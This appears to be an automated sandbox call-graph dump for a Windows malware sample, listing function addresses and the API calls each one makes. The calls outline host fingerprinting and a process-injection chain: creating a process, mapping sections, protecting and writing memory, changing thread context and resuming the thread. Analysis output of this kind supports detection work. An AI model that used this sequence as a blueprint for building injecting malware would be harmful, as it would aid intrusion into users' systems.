5366bd4 14176->14177 14178 5369df2 2 API calls 14176->14178 14177->14070 14179 5366bed 14178->14179 14180 5369df2 2 API calls 14179->14180 14226 53703bd GetTickCount 14225->14226 14227 5367c15 14226->14227 14461 536802c 14227->14461 14626 536970f 14242->14626 14245 53703bd GetTickCount 14246 5367a07 14245->14246 14632 5367df8 14246->14632 14248 5367a27 14249 5367611 19 API calls 14248->14249 14259 536148c 14248->14259 14250 5367a57 14249->14250 14253 53675ab 8 API calls 14250->14253 14266 5367a5e 14250->14266 14251 5368bf4 2 API calls 14252 5367b2d 14251->14252 14254 5368bf4 2 API calls 14252->14254 14255 5367a88 14253->14255 14256 5367b38 14254->14256 14255->14266 14671 5367858 14255->14671 14257 5368bf4 2 API calls 14256->14257 14257->14259 14259->14063 14259->14064 14260 5367ab6 14260->14266 14684 5367728 14260->14684 14264 5367b02 14706 53676d7 14264->14706 14266->14251 14268 5361104 14267->14268 14269 53610f2 14267->14269 14271 536a96c 4 API calls 14268->14271 14270 536a96c 4 API calls 14269->14270 14272 53610f9 14270->14272 14271->14272 14750 53610c5 14272->14750 14274 536111b 14274->14060 14275->14080 14277 5369e12 2 API calls 14276->14277 14278 53668b3 14277->14278 14279 536e712 14278->14279 14280 5369df2 2 API calls 14279->14280 14281 536e727 14280->14281 14430 536e400 CoInitializeEx CoInitializeSecurity CoCreateInstance 14281->14430 14284 5368baf 2 API calls 14285 536e73f 14284->14285 14286 5369df2 2 API calls 14285->14286 14301 53668b8 14285->14301 14287 536e753 14286->14287 14288 5369df2 2 API calls 14287->14288 14289 536e764 14288->14289 14437 536e656 SysAllocString SysAllocString 14289->14437 14291 536e775 14292 536e7a3 14291->14292 14294 53698bd RtlAllocateHeap 14291->14294 14293 5368baf 2 API calls 14292->14293 14295 536e7ac 14293->14295 14296 536e784 VariantClear 14294->14296 14297 5368baf 2 API calls 14295->14297 14296->14292 14299 536e7b5 14297->14299 14443 536e4b4 14299->14443 14301->14087 14303 5369df2 2 API calls 14302->14303 14304 536e7db 14303->14304 14305 536e400 6 API calls 14304->14305 14306 536e7e5 14305->14306 14307 5368baf 2 API calls 14306->14307 14308 536e7f3 14307->14308 14309 536696c 14308->14309 14310 5369df2 2 API calls 14308->14310 14325 536e87a 14309->14325 14311 536e807 14310->14311 14312 5369df2 2 API calls 14311->14312 14313 536e818 14312->14313 14314 536e656 10 API calls 14313->14314 14315 536e829 14314->14315 14316 536e857 14315->14316 14317 53698bd RtlAllocateHeap 14315->14317 14318 5368baf 2 API calls 14316->14318 14319 536e838 VariantClear 14317->14319 14320 536e860 14318->14320 14319->14316 14322 5368baf 2 API calls 14320->14322 14323 536e869 14322->14323 14324 536e4b4 2 API calls 14323->14324 14324->14309 14326 5369df2 2 API calls 14325->14326 14327 536e88f 14326->14327 14328 536e400 6 API calls 14327->14328 14329 536e899 14328->14329 14330 5368baf 2 API calls 14329->14330 14331 536e8a7 14330->14331 14332 5369df2 2 API calls 14331->14332 14347 5366974 14331->14347 14333 536e8bb 14332->14333 14334 5369df2 2 API calls 14333->14334 14335 536e8cc 14334->14335 14336 536e656 10 API calls 14335->14336 14337 536e8dd 14336->14337 14338 536e90b 14337->14338 14339 53698bd RtlAllocateHeap 14337->14339 14340 5368baf 2 API calls 14338->14340 14341 536e8ec VariantClear 14339->14341 14342 536e914 14340->14342 14341->14338 14344 5368baf 2 API calls 14342->14344 14345 536e91d 14344->14345 14346 536e4b4 2 API calls 14345->14346 14346->14347 14348 5366f6c 14347->14348 14448 5368bde RtlAllocateHeap 14348->14448 14350 5366f74 14351 5366f9d 14350->14351 14449 5368bde RtlAllocateHeap 14350->14449 14351->14100 14353 5366f85 14353->14351 14354 536ba09 memset 14353->14354 14355 5366f99 14354->14355 14355->14100 14357 5368d6d memset 14356->14357 14358 536b6f2 14357->14358 14359 5368d6d memset 14358->14359 14360 536b6fe 14359->14360 14361 536b856 14360->14361 14364 5366a94 14360->14364 14450 5368bde RtlAllocateHeap 14360->14450 14362 5368bf4 2 API calls 14361->14362 14362->14364 14364->14129 14365 5369a07 2 API calls 14367 536b76d 14365->14367 14366 5369880 RtlAllocateHeap 14366->14367 14367->14361 14367->14364 14367->14365 14367->14366 14368 5368bf4 2 API calls 14367->14368 14369 536b81c 14367->14369 14368->14367 14369->14361 14370 5369930 2 API calls 14369->14370 14371 536b83f 14370->14371 14371->14361 14372 536b845 14371->14372 14373 5368bf4 2 API calls 14372->14373 14373->14364 14374->14176 14431 536e445 SysAllocString 14430->14431 14432 536e482 14430->14432 14433 536e460 14431->14433 14432->14284 14433->14432 14434 536e464 CoSetProxyBlanket 14433->14434 14434->14432 14435 536e47b 14434->14435 14447 5368bde RtlAllocateHeap 14435->14447 14438 5369df2 2 API calls 14437->14438 14439 536e681 SysAllocString 14438->14439 14440 5368baf 2 API calls 14439->14440 14442 536e694 SysFreeString SysFreeString SysFreeString 14440->14442 14442->14291 14444 536e4bf 14443->14444 14445 5368bf4 2 API calls 14444->14445 14446 536e4dc 14445->14446 14446->14301 14447->14432 14448->14350 14449->14353 14450->14367 14462 5371152 7 API calls 14461->14462 14463 536803c 14462->14463 14464 5368753 strncpy 14463->14464 14465 5368055 14464->14465 14466 5368753 strncpy 14465->14466 14467 5368069 14466->14467 14468 5368753 strncpy 14467->14468 14469 536807a 14468->14469 14470 5368753 strncpy 14469->14470 14471 536808b 14470->14471 14472 5368753 strncpy 14471->14472 14473 53680a1 14472->14473 14474 5368753 strncpy 14473->14474 14475 53680b5 14474->14475 14476 5368753 strncpy 14475->14476 14477 53680ce 14476->14477 14478 5368753 strncpy 14477->14478 14479 53680e2 14478->14479 14480 5368753 strncpy 14479->14480 14481 53680f6 14480->14481 14482 5368753 strncpy 14481->14482 14483 536810a 14482->14483 14484 5368753 strncpy 14483->14484 14485 5368120 14484->14485 14486 5368753 strncpy 14485->14486 14487 5368137 14486->14487 14611 53687af 14487->14611 14490 5368753 strncpy 14491 536814a 14490->14491 14492 5368753 strncpy 14491->14492 14493 536815e 14492->14493 14494 5368753 strncpy 14493->14494 14495 5368172 14494->14495 14496 53687af 5 API calls 14495->14496 14497 536817a 14496->14497 14498 5368753 strncpy 14497->14498 14499 5368185 14498->14499 14500 53687af 5 API calls 14499->14500 14501 536818d 14500->14501 14502 5368753 strncpy 14501->14502 14503 5368198 14502->14503 14504 53687af 5 API calls 14503->14504 14505 53681a0 14504->14505 14506 5368753 strncpy 14505->14506 14507 53681ab 14506->14507 14508 5368753 strncpy 14507->14508 14509 53681bf 14508->14509 14510 53687af 5 API calls 14509->14510 14511 53681c7 14510->14511 14512 5368753 strncpy 14511->14512 14513 53681d2 14512->14513 14514 5368753 strncpy 14513->14514 14515 53681ec 14514->14515 14516 53687af 5 API calls 14515->14516 14517 53681f4 14516->14517 14518 5368753 strncpy 14517->14518 14519 53681ff 14518->14519 14520 5368753 strncpy 14519->14520 14521 5368213 14520->14521 14522 5368753 strncpy 14521->14522 14523 5368227 14522->14523 14524 53687af 5 API calls 14523->14524 14525 536823b 14524->14525 14526 5368753 strncpy 14525->14526 14527 5368246 14526->14527 14528 5368753 strncpy 14527->14528 14529 536825a 14528->14529 14530 5368753 strncpy 14529->14530 14531 536826e 14530->14531 14532 53687af 5 API calls 14531->14532 14533 5368279 14532->14533 14534 5368753 strncpy 14533->14534 14535 5368284 14534->14535 14536 53687af 5 API calls 14535->14536 14537 536828f 14536->14537 14538 5368753 strncpy 14537->14538 14539 536829a 14538->14539 14540 53687af 5 API calls 14539->14540 14541 53682a5 14540->14541 14542 5368753 strncpy 14541->14542 14543 53682b0 14542->14543 14544 53687af 5 API calls 14543->14544 14545 53682bb 14544->14545 14546 5368753 strncpy 14545->14546 14547 53682c6 14546->14547 14548 53687af 5 API calls 14547->14548 14549 53682d1 14548->14549 14550 5368753 strncpy 14549->14550 14551 53682dc 14550->14551 14552 53687af 5 API calls 14551->14552 14553 53682e7 14552->14553 14554 5368753 strncpy 14553->14554 14555 53682f2 14554->14555 14556 53687af 5 API calls 14555->14556 14557 53682fd 14556->14557 14558 5368753 strncpy 14557->14558 14559 5368308 14558->14559 14560 53687af 5 API calls 14559->14560 14561 5368313 14560->14561 14562 5368753 strncpy 14561->14562 14563 536831e 14562->14563 14564 53687af 5 API calls 14563->14564 14565 5368329 14564->14565 14566 5368753 strncpy 14565->14566 14567 5368334 14566->14567 14568 53687af 5 API calls 14567->14568 14569 5368342 14568->14569 14570 5368753 strncpy 14569->14570 14571 536834d 14570->14571 14572 53687af 5 API calls 14571->14572 14573 5368358 14572->14573 14574 5368753 strncpy 14573->14574 14575 5368363 14574->14575 14576 53687af 5 API calls 14575->14576 14577 536836e 14576->14577 14578 5368753 strncpy 14577->14578 14616 536996c 14611->14616 14613 536813f 14613->14490 14614 53687c2 14614->14613 14615 5368bf4 2 API calls 14614->14615 14615->14613 14617 536997b WideCharToMultiByte 14616->14617 14624 53699cb 14616->14624 14618 5369996 14617->14618 14617->14624 14625 5368bde RtlAllocateHeap 14618->14625 14620 536999f 14621 53699a7 WideCharToMultiByte 14620->14621 14620->14624 14622 53699c0 14621->14622 14621->14624 14623 5368bf4 2 API calls 14622->14623 14623->14624 14624->14614 14625->14620 14627 536971d 14626->14627 14628 5373674 2 API calls 14627->14628 14629 5369767 14628->14629 14630 5367a02 14629->14630 14631 5373674 2 API calls 14629->14631 14630->14245 14631->14629 14633 5371152 7 API calls 14632->14633 14634 5367e07 14633->14634 14635 5368753 strncpy 14634->14635 14636 5367e1d 14635->14636 14637 5368753 strncpy 14636->14637 14638 5367e32 14637->14638 14639 5368753 strncpy 14638->14639 14640 5367e46 14639->14640 14641 5368753 strncpy 14640->14641 14642 5367e5b 14641->14642 14643 5368753 strncpy 14642->14643 14644 5367e6c 14643->14644 14645 5368753 strncpy 14644->14645 14646 5367e85 14645->14646 14647 5368753 strncpy 14646->14647 14648 5367e9b 14647->14648 14649 5368753 strncpy 14648->14649 14650 5367eac 14649->14650 14651 5368753 strncpy 14650->14651 14652 5367ec0 14651->14652 14653 5368753 strncpy 14652->14653 14654 5367ed3 14653->14654 14655 5368753 strncpy 14654->14655 14656 5367ee7 14655->14656 14657 5368753 strncpy 14656->14657 14658 5367f06 14657->14658 14659 53687af 5 API calls 14658->14659 14660 5367f17 14659->14660 14661 5368753 strncpy 14660->14661 14662 5367f22 14661->14662 14663 53687af 5 API calls 14662->14663 14664 5367f33 14663->14664 14665 5368753 strncpy 14664->14665 14666 5367f3e 14665->14666 14667 5368753 strncpy 14666->14667 14668 5367f5a 14667->14668 14669 5371bd3 13 API calls 14668->14669 14670 5367f62 14669->14670 14670->14248 14672 5371cc0 18 API calls 14671->14672 14673 5367876 14672->14673 14674 5369edb memset 14673->14674 14677 5367882 14673->14677 14675 53678b6 14674->14675 14675->14677 14713 5368bde RtlAllocateHeap 14675->14713 14677->14260 14678 536798e 14680 5368bf4 2 API calls 14678->14680 14682 536799f 14678->14682 14679 536793a 14679->14677 14679->14678 14681 5369880 RtlAllocateHeap 14679->14681 14680->14678 14681->14679 14683 5368bf4 2 API calls 14682->14683 14683->14677 14685 536773f 14684->14685 14686 536c307 2 API calls 14685->14686 14694 53677cf 14685->14694 14687 536775b 14686->14687 14687->14694 14697 53677a7 14687->14697 14714 5368bde RtlAllocateHeap 14687->14714 14689 5368bf4 2 API calls 14691 53677c5 14689->14691 14690 5367778 14693 5369e12 2 API calls 14690->14693 14690->14697 14692 5368bf4 2 API calls 14691->14692 14692->14694 14695 5367797 14693->14695 14694->14266 14698 5361190 14694->14698 14715 53689dd 14695->14715 14697->14689 14699 536111d 8 API calls 14698->14699 14700 53611a1 14699->14700 14701 53611ae 14700->14701 14702 5368d6d memset 14700->14702 14701->14264 14703 53611c4 14702->14703 14704 5361dd3 6 API calls 14703->14704 14705 53611d4 14704->14705 14705->14264 14731 5367f75 14706->14731 14708 53676f4 14709 5367611 19 API calls 14708->14709 14710 5367714 14709->14710 14711 5368bf4 2 API calls 14710->14711 14712 536771f 14711->14712 14712->14266 14713->14679 14714->14690 14718 5368871 14715->14718 14725 53687e5 14718->14725 14721 53688ca GetLastError 14724 5368959 14721->14724 14722 5368bf4 2 API calls 14723 536889e 14722->14723 14723->14697 14724->14722 14730 5368bde RtlAllocateHeap 14725->14730 14727 53687f6 14728 536883d lstrlenA 14727->14728 14729 536884e 14727->14729 14728->14729 14729->14721 14729->14723 14729->14724 14730->14727 14732 5371152 7 API calls 14731->14732 14733 5367f84 14732->14733 14734 5368753 strncpy 14733->14734 14735 5367f9a 14734->14735 14736 5368753 strncpy 14735->14736 14737 5367fae 14736->14737 14738 5368753 strncpy 14737->14738 14739 5367fbf 14738->14739 14740 5368753 strncpy 14739->14740 14741 5367fd0 14740->14741 14742 5368753 strncpy 14741->14742 14743 5367fe5 14742->14743 14744 5368753 strncpy 14743->14744 14745 5367ffb 14744->14745 14746 5368753 strncpy 14745->14746 14747 5368011 14746->14747 14748 5371bd3 13 API calls 14747->14748 14749 5368019 14748->14749 14749->14708 14751 5369e12 2 API calls 14750->14751 14752 53610df 14751->14752 14752->14274 15297 536598e 15302 536e4e0 15297->15302 15300 53659a3 GetLastError 15301 53659ac 15300->15301 15327 5368bde RtlAllocateHeap 15302->15327 15304 536e4f7 15305 53698bd RtlAllocateHeap 15304->15305 15324 536599f 15304->15324 15306 536e50c 15305->15306 15306->15324 15328 536a46b 15306->15328 15309 5369df2 2 API calls 15310 536e52c 15309->15310 15311 5369e51 2 API calls 15310->15311 15312 536e541 15311->15312 15313 5368baf 2 API calls 15312->15313 15314 536e54a 15313->15314 15336 536e330 15314->15336 15316 536e554 15317 536e55b 15316->15317 15343 536e374 15316->15343 15319 5368bf4 2 API calls 15317->15319 15320 536e62e 15319->15320 15321 5368bf4 2 API calls 15320->15321 15322 536e639 15321->15322 15323 5368bf4 2 API calls 15322->15323 15323->15324 15324->15300 15324->15301 15325 536e56a 15325->15317 15326 536e601 lstrlenW 15325->15326 15326->15325 15327->15304 15329 536a484 15328->15329 15330 5368c72 3 API calls 15329->15330 15334 536a584 15329->15334 15335 536a4ff 15329->15335 15330->15335 15331 536a55c 15332 5368d6d memset 15331->15332 15331->15334 15332->15334 15333 5368ce0 lstrlenA 15333->15335 15334->15309 15335->15331 15335->15333 15337 5369df2 2 API calls 15336->15337 15338 536e342 15337->15338 15339 5369d18 4 API calls 15338->15339 15340 536e34c 15339->15340 15341 5368baf 2 API calls 15340->15341 15342 536e357 15341->15342 15342->15316 15344 5369a5a 2 API calls 15343->15344 15345 536e38d CoInitializeEx 15344->15345 15346 5369df2 2 API calls 15345->15346 15347 536e3a8 15346->15347 15348 5369df2 2 API calls 15347->15348 15349 536e3b9 15348->15349 15350 5368baf 2 API calls 15349->15350 15351 536e3d5 15350->15351 15352 5368baf 2 API calls 15351->15352 15353 536e3eb 15352->15353 15354 5368bf4 2 API calls 15353->15354 15355 536e3f6 15354->15355 15355->15325 11224 53664ef 11225 53664fd 11224->11225 11230 5366555 11224->11230 11253 5368bc9 HeapCreate 11225->11253 11227 5366502 11254 5369591 11227->11254 11237 5366550 11240 5368baf 2 API calls 11237->11240 11238 536655a 11274 5368baf 11238->11274 11240->11230 11246 53665b1 CreateThread 11246->11230 11354 5366298 11246->11354 11247 536f05c 8 API calls 11248 536658c 11247->11248 11287 5366370 memset 11248->11287 11253->11227 11306 5368bde RtlAllocateHeap 11254->11306 11256 5366507 11257 5373cd5 11256->11257 11258 5373d0a 11257->11258 11307 5368c43 11258->11307 11260 5366515 11261 536f05c 11260->11261 11311 5369dd8 11261->11311 11264 536f086 LoadLibraryA 11266 536f08d 11264->11266 11265 536f07e GetModuleHandleA 11265->11266 11267 536f09b 11266->11267 11314 536f011 11266->11314 11319 5368b9c 11267->11319 11271 5369df2 11337 5368ac6 11271->11337 11273 536653c GetFileAttributesW 11273->11237 11273->11238 11275 536655f 11274->11275 11276 5368bbd 11274->11276 11278 536109a 11275->11278 11277 5368bf4 2 API calls 11276->11277 11277->11275 11279 5368ac6 2 API calls 11278->11279 11280 53610b5 11279->11280 11281 5369cb5 11280->11281 11282 5369cd1 11281->11282 11286 5366573 11282->11286 11343 5368bde RtlAllocateHeap 11282->11343 11284 5369ce4 11285 5368bf4 2 API calls 11284->11285 11284->11286 11285->11286 11286->11246 11286->11247 11344 5361080 11287->11344 11289 536639c 11290 53663ec 11289->11290 11291 53663ad 11289->11291 11292 5361080 2 API calls 11290->11292 11293 5361080 2 API calls 11291->11293 11294 53663f6 11292->11294 11295 53663b5 11293->11295 11298 5368b9c 2 API calls 11294->11298 11347 5369e12 11295->11347 11297 53663cb 11299 5368b9c 2 API calls 11297->11299 11300 53663d6 11298->11300 11299->11300 11301 5368bf4 11300->11301 11302 53665a1 11301->11302 11303 5368bfe 11301->11303 11302->11246 11303->11302 11304 5368d6d memset 11303->11304 11305 5368c2e HeapFree 11304->11305 11305->11302 11306->11256 11310 5368bde RtlAllocateHeap 11307->11310 11309 5368c54 11309->11260 11310->11309 11323 53689ef 11311->11323 11330 5368bde RtlAllocateHeap 11314->11330 11316 536f052 11316->11267 11317 536f023 11317->11316 11331 536eebb 11317->11331 11320 5368ba4 11319->11320 11321 536652b 11319->11321 11322 5368bf4 2 API calls 11320->11322 11321->11271 11322->11321 11324 5368a12 11323->11324 11324->11324 11325 5368a6a lstrlenA 11324->11325 11326 5368a78 11325->11326 11328 5368a81 11325->11328 11329 5368bde RtlAllocateHeap 11326->11329 11328->11264 11328->11265 11329->11328 11330->11317 11332 536ef2f 11331->11332 11333 536eed4 11331->11333 11332->11317 11333->11332 11334 536ef87 LoadLibraryA 11333->11334 11334->11332 11335 536ef95 GetProcAddress 11334->11335 11335->11332 11336 536efa1 11335->11336 11336->11332 11338 5368ae4 lstrlenA 11337->11338 11342 5368bde RtlAllocateHeap 11338->11342 11341 5368b60 11341->11273 11341->11341 11342->11341 11343->11284 11345 53689ef 2 API calls 11344->11345 11346 5361096 11345->11346 11346->11289 11351 5368d6d 11347->11351 11350 5369e40 11350->11297 11352 5368d76 memset 11351->11352 11353 5368d87 _vsnprintf 11351->11353 11352->11353 11353->11350 11366 5366412 11354->11366 11358 53662b3 11359 53662a9 11359->11358 11363 53662e3 11359->11363 11429 536d804 11359->11429 11361 536631a 11361->11358 11467 53635a1 11361->11467 11362 5366313 11445 536611b 11362->11445 11363->11361 11363->11362 11367 536f05c 8 API calls 11366->11367 11368 5366426 11367->11368 11369 536f05c 8 API calls 11368->11369 11370 536643f 11369->11370 11371 536f05c 8 API calls 11370->11371 11372 5366458 11371->11372 11373 536f05c 8 API calls 11372->11373 11374 5366471 11373->11374 11375 536f05c 8 API calls 11374->11375 11376 536648a 11375->11376 11377 536f05c 8 API calls 11376->11377 11378 53664a1 11377->11378 11379 536f05c 8 API calls 11378->11379 11380 53664b8 11379->11380 11381 536f05c 8 API calls 11380->11381 11382 53664cf 11381->11382 11383 536f05c 8 API calls 11382->11383 11384 536629d GetOEMCP 11383->11384 11385 536df3d 11384->11385 11474 5368bde RtlAllocateHeap 11385->11474 11387 536df58 11388 536df63 GetCurrentProcessId 11387->11388 11428 536e2b8 11387->11428 11389 536df7b 11388->11389 11475 536c879 11389->11475 11391 536dfdf 11491 536f3a3 11391->11491 11392 536dfce 11392->11391 11482 536c8c9 11392->11482 11397 536e014 11398 536e064 GetSystemMetrics 11397->11398 11399 536e05e GetLastError 11397->11399 11400 536e08b 11398->11400 11399->11398 11500 536c6ce 11400->11500 11406 536e0c6 11517 536c6e4 11406->11517 11411 5368d6d memset 11412 536e11d GetVersionExA 11411->11412 11536 536dd39 11412->11536 11416 536e13b GetWindowsDirectoryW 11417 5369df2 2 API calls 11416->11417 11418 536e15e 11417->11418 11419 5368baf 2 API calls 11418->11419 11420 536e198 11419->11420 11422 536e1d0 11420->11422 11559 5369e51 11420->11559 11542 537351a 11422->11542 11428->11359 11638 536d6dc 11429->11638 11432 536d950 11432->11363 11434 536d945 11436 5368bf4 2 API calls 11434->11436 11435 536d933 11435->11434 11437 5368bf4 2 API calls 11435->11437 11436->11432 11437->11435 11438 5368d6d memset 11444 536d841 11438->11444 11441 536d8b4 GetLastError 11668 536da57 ResumeThread 11441->11668 11443 536d8de FindCloseChangeNotification 11443->11444 11444->11434 11444->11435 11444->11438 11444->11441 11444->11443 11650 536bc84 11444->11650 11655 536d959 11444->11655 11738 536a608 11445->11738 11448 536612a 11448->11358 11449 5366142 11754 5366247 11449->11754 11452 5366147 11453 53661a0 11452->11453 11454 5366151 11452->11454 11788 536600c 11453->11788 11457 5366156 11454->11457 11458 53661a5 11454->11458 11456 53661c1 11456->11358 11457->11456 11461 536b557 7 API calls 11457->11461 11458->11456 11466 536619e 11458->11466 11801 5370a67 11458->11801 11462 5366176 11461->11462 11765 5365edd 11462->11765 11822 5365ff2 11466->11822 13038 5368bde RtlAllocateHeap 11467->13038 11469 53635a8 11470 53635df 11469->11470 13039 5368bde RtlAllocateHeap 11469->13039 11470->11358 11472 53635b9 11472->11470 11473 53696da 2 API calls 11472->11473 11473->11470 11474->11387 11476 536c890 11475->11476 11477 536c894 11476->11477 11563 536c862 11476->11563 11477->11392 11480 536c8b9 FindCloseChangeNotification 11481 536c8a5 11480->11481 11481->11392 11576 536c79e GetCurrentThread OpenThreadToken 11482->11576 11485 536c7f5 6 API calls 11490 536c8fd FindCloseChangeNotification 11485->11490 11487 536c975 11489 5368bf4 2 API calls 11487->11489 11488 536c97f 11488->11391 11489->11488 11490->11487 11490->11488 11493 536f3c2 11491->11493 11492 536e009 11495 536f368 11492->11495 11493->11492 11581 53698bd 11493->11581 11496 536f37f 11495->11496 11497 536f39f 11496->11497 11498 53698bd RtlAllocateHeap 11496->11498 11497->11397 11499 536f38c 11498->11499 11499->11397 11586 536c5ec 11500->11586 11502 536c6e2 11503 536c4c1 11502->11503 11504 536c4dc 11503->11504 11505 5369dd8 2 API calls 11504->11505 11506 536c4e6 11505->11506 11601 5373674 11506->11601 11508 536c4fb 11509 536c531 11508->11509 11512 5373674 2 API calls 11508->11512 11510 5368b9c 2 API calls 11509->11510 11511 536c53d 11510->11511 11513 53699df 11511->11513 11512->11508 11514 53699e6 11513->11514 11515 53699eb MultiByteToWideChar 11513->11515 11514->11406 11516 53699ff 11515->11516 11516->11406 11518 5369dd8 2 API calls 11517->11518 11519 536c6fd 11518->11519 11520 5369dd8 2 API calls 11519->11520 11521 536c709 11520->11521 11522 536c799 11521->11522 11523 5373674 2 API calls 11521->11523 11524 536c75a 11521->11524 11530 536ca46 11522->11530 11523->11521 11525 5373674 2 API calls 11524->11525 11526 536c785 11524->11526 11525->11524 11527 5368b9c 2 API calls 11526->11527 11528 536c791 11527->11528 11529 5368b9c 2 API calls 11528->11529 11529->11522 11531 536ca5e 11530->11531 11532 536ca62 11531->11532 11533 536c7f5 6 API calls 11531->11533 11532->11411 11534 536ca76 11533->11534 11534->11532 11535 5368bf4 2 API calls 11534->11535 11535->11532 11537 536dd4e GetCurrentProcess IsWow64Process 11536->11537 11538 536dd5f 11536->11538 11537->11538 11539 536dd62 11538->11539 11540 536dd71 GetSystemInfo 11539->11540 11541 536dd6c 11539->11541 11540->11416 11541->11416 11543 536e299 11542->11543 11544 5373525 11542->11544 11546 53696da 11543->11546 11544->11543 11545 5373674 2 API calls 11544->11545 11545->11544 11606 5369662 11546->11606 11549 536dae3 11560 5368d6d memset 11559->11560 11561 5369e65 _vsnwprintf 11560->11561 11562 5369e82 11561->11562 11562->11422 11566 536c7f5 GetTokenInformation 11563->11566 11567 536c817 GetLastError 11566->11567 11574 536c834 11566->11574 11568 536c822 11567->11568 11567->11574 11575 5368bde RtlAllocateHeap 11568->11575 11570 536c82a 11571 536c838 GetTokenInformation 11570->11571 11570->11574 11572 536c84d 11571->11572 11571->11574 11573 5368bf4 2 API calls 11572->11573 11573->11574 11574->11480 11574->11481 11575->11570 11577 536c7bf GetLastError 11576->11577 11578 536c7eb 11576->11578 11577->11578 11579 536c7cc OpenProcessToken 11577->11579 11578->11485 11578->11488 11579->11578 11582 53698c6 11581->11582 11583 53698d8 11581->11583 11585 5368bde RtlAllocateHeap 11582->11585 11583->11492 11585->11583 11587 5368d6d memset 11586->11587 11588 536c60e lstrcpynW 11587->11588 11590 5369df2 2 API calls 11588->11590 11591 536c643 GetVolumeInformationW 11590->11591 11592 5368baf 2 API calls 11591->11592 11593 536c678 11592->11593 11594 5369e51 2 API calls 11593->11594 11595 536c699 lstrcatW 11594->11595 11599 536a456 11595->11599 11598 536c6bf 11598->11502 11600 536a45e CharUpperBuffW 11599->11600 11600->11598 11602 5373684 11601->11602 11603 53736b7 lstrlenW 11602->11603 11604 53736d4 _ftol2_sse 11603->11604 11604->11508 11607 5369672 11606->11607 11607->11607 11608 5373674 2 API calls 11607->11608 11611 536968d 11608->11611 11609 53696c1 11609->11549 11610 5373674 2 API calls 11610->11611 11611->11609 11611->11610 11639 536d6fb 11638->11639 11669 5368bde RtlAllocateHeap 11639->11669 11641 536d7f3 11641->11432 11646 536b557 11641->11646 11642 5369df2 2 API calls 11644 536d796 11642->11644 11643 5368baf 2 API calls 11643->11644 11644->11641 11644->11642 11644->11643 11645 53698bd RtlAllocateHeap 11644->11645 11645->11644 11647 536b570 11646->11647 11670 536b4a6 11647->11670 11651 5368d6d memset 11650->11651 11652 536bc9a 11651->11652 11653 5368d6d memset 11652->11653 11654 536bca7 CreateProcessW 11653->11654 11654->11444 11679 536d218 11655->11679 11658 536da49 11726 536d38b 11658->11726 11663 5368d6d memset 11664 536d99f GetThreadContext 11663->11664 11664->11658 11665 536d9c9 NtProtectVirtualMemory 11664->11665 11665->11658 11666 536da0b NtWriteVirtualMemory 11665->11666 11666->11658 11667 536da28 NtProtectVirtualMemory 11666->11667 11667->11658 11668->11444 11669->11644 11671 537351a 2 API calls 11670->11671 11672 536b4be 11671->11672 11673 5369dd8 2 API calls 11672->11673 11674 536b4e8 11673->11674 11675 5369e12 2 API calls 11674->11675 11676 536b546 11675->11676 11677 5368b9c 2 API calls 11676->11677 11678 536b551 11677->11678 11678->11444 11680 536d246 11679->11680 11681 536d234 11679->11681 11682 5369df2 2 API calls 11680->11682 11681->11680 11683 536d373 11681->11683 11684 536d253 11682->11684 11683->11658 11705 536d447 11683->11705 11685 5369e51 2 API calls 11684->11685 11686 536d28c 11685->11686 11687 5369df2 2 API calls 11686->11687 11688 536d2ab 11687->11688 11731 5369a5a 11688->11731 11691 5368baf 2 API calls 11692 536d2d3 11691->11692 11693 5369a5a 2 API calls 11692->11693 11694 536d2f6 LoadLibraryW 11693->11694 11696 536d32f 11694->11696 11697 536d321 11694->11697 11699 5368bf4 2 API calls 11696->11699 11698 536f011 3 API calls 11697->11698 11698->11696 11700 536d344 11699->11700 11701 5368d6d memset 11700->11701 11702 536d356 11701->11702 11702->11683 11703 5368bf4 2 API calls 11702->11703 11704 536d371 11703->11704 11704->11683 11706 536d47a 11705->11706 11707 536d49b NtCreateSection 11706->11707 11712 536d68e 11706->11712 11708 536d4c4 RegisterClassExA 11707->11708 11707->11712 11709 536d554 NtMapViewOfSection 11708->11709 11710 536d518 CreateWindowExA 11708->11710 11709->11712 11718 536d587 NtMapViewOfSection 11709->11718 11710->11709 11713 536d542 DestroyWindow UnregisterClassA 11710->11713 11711 536d6c3 11714 536d6d7 11711->11714 11715 536d6cc NtClose 11711->11715 11712->11711 11717 536d6bf NtUnmapViewOfSection 11712->11717 11713->11709 11714->11658 11714->11663 11715->11714 11717->11711 11718->11712 11719 536d5ab 11718->11719 11720 5368c43 RtlAllocateHeap 11719->11720 11721 536d5bb 11720->11721 11721->11712 11722 536d5ca VirtualAllocEx WriteProcessMemory 11721->11722 11723 5368bf4 2 API calls 11722->11723 11724 536d611 11723->11724 11725 536d674 lstrlenW 11724->11725 11725->11712 11727 536d394 FreeLibrary 11726->11727 11729 536d3a2 11726->11729 11727->11729 11728 536d3c3 11728->11444 11729->11728 11730 5368bf4 2 API calls 11729->11730 11730->11728 11733 5369a6c 11731->11733 11737 5368bde RtlAllocateHeap 11733->11737 11734 5369a8b 11735 5369a97 lstrcatW 11734->11735 11736 5369aa8 11734->11736 11735->11734 11736->11691 11737->11734 11826 536a633 11738->11826 11741 5370c7b 11890 5368bde RtlAllocateHeap 11741->11890 11743 5370c82 11744 5370c8c 11743->11744 11891 536b3c7 11743->11891 11744->11449 11747 5370cd0 11747->11449 11752 5370a67 14 API calls 11753 5370ccd 11752->11753 11753->11449 11928 5365ce2 11754->11928 11757 5366250 11757->11452 11758 5365edd 10 API calls 11759 5366267 11758->11759 11760 5366270 11759->11760 11931 536a9d6 11759->11931 11760->11452 11763 5366295 11763->11452 11764 536627d lstrcmpiW 11764->11452 11766 536b557 7 API calls 11765->11766 11767 5365ef6 11766->11767 11768 5365f03 11767->11768 11769 5369a07 2 API calls 11767->11769 11770 5365f26 11769->11770 11958 5365ed4 11770->11958 11772 5368bf4 2 API calls 11773 5365f66 11772->11773 11777 53660bf 11773->11777 11774 5365f36 11775 5365ed4 2 API calls 11774->11775 11776 5365f5a 11774->11776 11775->11776 11776->11772 11778 536a9d6 4 API calls 11777->11778 11779 53660c9 11778->11779 11780 53660d7 lstrcmpiW 11779->11780 11786 53660d2 11779->11786 11781 53660ed 11780->11781 11782 5366109 11780->11782 11963 536aace 11781->11963 11784 5368bf4 2 API calls 11782->11784 11784->11786 11786->11466 12012 5368bde RtlAllocateHeap 11788->12012 11790 536601e 11791 5366062 11790->11791 11792 5366031 GetDriveTypeW 11790->11792 12013 5362be4 11791->12013 11792->11791 11794 536607e 11795 536609c 11794->11795 12028 53653c7 11794->12028 12098 536afd6 11795->12098 11799 536afd6 2 API calls 11800 53660b8 11799->11800 11800->11458 11802 536109a 2 API calls 11801->11802 11803 5370a76 